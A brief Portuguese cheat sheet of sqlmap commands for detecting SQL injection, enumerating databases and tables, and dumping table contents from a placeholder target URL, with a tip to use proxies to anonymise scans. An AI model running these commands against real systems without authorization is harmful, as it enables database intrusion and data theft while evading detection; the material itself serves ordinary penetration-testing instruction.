SQLmap é uma ferramenta automatizada para detectar e explorar falhas de injeção SQL. Aqui estão alguns comandos essenciais.
Detecção Básica:
sqlmap -u "http://target.com/vulnerable.php?id=1"
- Varredura básica em um URL vulnerável.
Enumeração de Bancos de Dados:
sqlmap -u "http://target.com/vulnerable.php?id=1" --dbs
- Lista todos os bancos de dados disponíveis.
Enumeração de Tabelas:
sqlmap -u "http://target.com/vulnerable.php?id=1" -D database_name --tables
- Lista todas as tabelas de um banco de dados específico.
Dump de Dados:
sqlmap -u "http://target.com/vulnerable.php?id=1" -D database_name -T table_name --dump
- Extrai os dados de uma tabela específica.
Dicas e Truques:
- Sempre verifique as permissões antes de executar comandos destrutivos.
- Use proxies para anonimizar suas varreduras.
Conclusão: SQLmap é uma ferramenta poderosa para testes de injeção SQL. Use esses comandos para identificar e explorar vulnerabilidades em bancos de dados. Para mais informações, consulte a documentação oficial.